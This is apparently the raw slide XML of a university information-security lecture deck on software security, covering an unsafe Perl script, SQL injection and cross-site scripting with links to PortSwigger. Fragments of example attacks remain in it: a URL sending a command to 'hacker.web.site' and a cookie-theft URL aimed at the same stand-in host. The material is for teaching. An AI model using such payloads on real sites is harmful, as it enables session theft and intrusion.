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4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide38.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41.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide9.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44.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96" r:id="rId15"/>
    <p:sldId id="297" r:id="rId16"/>
    <p:sldId id="295" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="298" r:id="rId19"/>
    <p:sldId id="299" r:id="rId20"/>
    <p:sldId id="30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1446" y="2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54380" y="2409444"/>
            <a:ext cx="8549640" cy="163220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5/10/2023</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01600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="114"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-5" dirty="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr spc="-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Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="30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5/10/2023</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01600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="114"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-5" dirty="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr spc="-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Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>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5/10/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Holder 7"/>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01600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="114"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-5" dirty="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr spc="-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6705600"/>
            <a:ext cx="9144000" cy="609600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="609600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="609600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="609600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FEBC11"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="bk object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="457200"/>
            <a:ext cx="9144000" cy="1447800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="1447800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1447800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="1447799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FEBC11"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="bk object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="6822185"/>
            <a:ext cx="2000250" cy="445770"/>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1" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>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5/10/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5"/>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01600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="114"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-5" dirty="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr spc="-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5/10/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4"/>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01600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="114"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-5" dirty="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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6705600"/>
            <a:ext cx="9144000" cy="609600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="609600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="609600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="609600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FEBC11"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Holder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3536949" y="1006855"/>
            <a:ext cx="2984500" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992505" y="2077465"/>
            <a:ext cx="8073389" cy="3995420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="30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5/10/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8827516" y="6888788"/>
            <a:ext cx="325120" cy="243204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="101600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="114"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-5" dirty="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr spc="-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portswigger.net/web-security/sql-injection#subverting-application-logic" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection#retrieving-hidden-data" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/blind" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/examining-the-database" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/union-attack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hacker.web.site/hack.txt?&amp;amp;cmd=l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portswigger.net/web-security/cross-site-scripting#stored-cross-site-scripting" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting#reflected-cross-site-scripting" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting#dom-based-cross-site-scripti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portswigger.net/web-security/cross-site-scripting"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hacker.web.site/cookie.cgi?%27%2B"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457200"/>
            <a:ext cx="9144000" cy="1447800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="1447800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1447800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="1447799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FEBC11"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1823704" y="2603246"/>
            <a:ext cx="6410960" cy="1122680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="635" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>IT 4823</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Information Security</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Administration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3645661" y="3830065"/>
            <a:ext cx="2766060" cy="482600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="585858"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Software</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="585858"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="585858"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8153400" y="6813042"/>
            <a:ext cx="1219200" cy="425957"/>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457200" y="456254"/>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401059" y="1006855"/>
            <a:ext cx="3256279" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Unsafe Perl</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="2130551"/>
            <a:ext cx="6769100" cy="269875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="269875">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="269748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="269747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2103276"/>
            <a:ext cx="17780" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17780" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17525" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17525" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1972586" y="2112269"/>
            <a:ext cx="17780" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17780" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="18284"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17226" y="18284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18284"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2103276"/>
            <a:ext cx="17780" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17780" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17525" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17525" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1972586" y="2112269"/>
            <a:ext cx="17780" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17780" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="18284"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17226" y="18284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18284"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="2112264"/>
            <a:ext cx="6769100" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="18288"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6768846" y="18288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18288"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998725" y="2103276"/>
            <a:ext cx="6769100" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6768855" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768855" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="2103276"/>
            <a:ext cx="17145" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17145" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16766" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16766" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="2103276"/>
            <a:ext cx="17145" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17145" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16766" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16766" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
